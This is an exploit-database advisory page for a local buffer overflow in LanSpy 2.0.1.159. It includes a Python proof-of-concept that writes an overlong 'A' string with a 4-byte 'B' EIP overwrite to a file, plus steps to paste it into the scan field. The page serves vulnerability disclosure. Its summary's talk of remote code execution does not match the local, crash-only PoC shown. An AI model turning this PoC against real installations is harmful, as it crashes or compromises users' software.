LanSpy 2.0.1.159 - Local BoF (PoC)

vendor:

LanSpy

by:

Gionathan "John" Reale

7.5

CVSS

HIGH

Buffer Overflow

119

CWE

Product Name: LanSpy

Affected Version From: 2.0.1.159

Affected Version To: 2.0.1.159

Patch Exists: NO

Related CWE:

CPE: a:lizardsystems:lanspy:2.0.1.159

Metasploit:

Other Scripts:

Platforms Tested: Windows 7 32-bit

2018

LanSpy 2.0.1.159 – Local BoF (PoC)

This exploit creates a malicious payload using a buffer overflow vulnerability in LanSpy 2.0.1.159. It generates a payload with a specific length and overflows the buffer, causing a crash or potentially allowing for remote code execution.

Mitigation:

The vendor should release a patch or update to fix the buffer overflow vulnerability. In the meantime, users should avoid running LanSpy on untrusted networks or opening suspicious files.

Source

Exploit-DB raw data:

# Exploit Title: LanSpy 2.0.1.159 - Local BoF (PoC)
# Author: Gionathan "John" Reale
# Discovey Date: 2018-12-07
# Homepage: https://lizardsystems.com
# Software Link: https://lizardsystems.com/download/lanspy_setup.exe
# Tested Version: 2.0.1.159
# Tested on OS: Windows 7 32-bit
# Steps to Reproduce: Run the python exploit script, it will create a new 
# file with the name "exploit.txt" just copy the text inside "exploit.txt"
# and start the program. In the new window paste the content of 
# "exploit.txt" into the scan field. Click the start button.

#!/usr/bin/python
   
buffer = "A" * 688

eip = "B" * 4

payload = buffer + eip
try:
    f=open("exploit.txt","w")
    print "[+] Creating %s bytes evil payload.." %len(payload)
    f.write(payload)
    f.close()
    print "[+] File created!"
except:
    print "File cannot be created"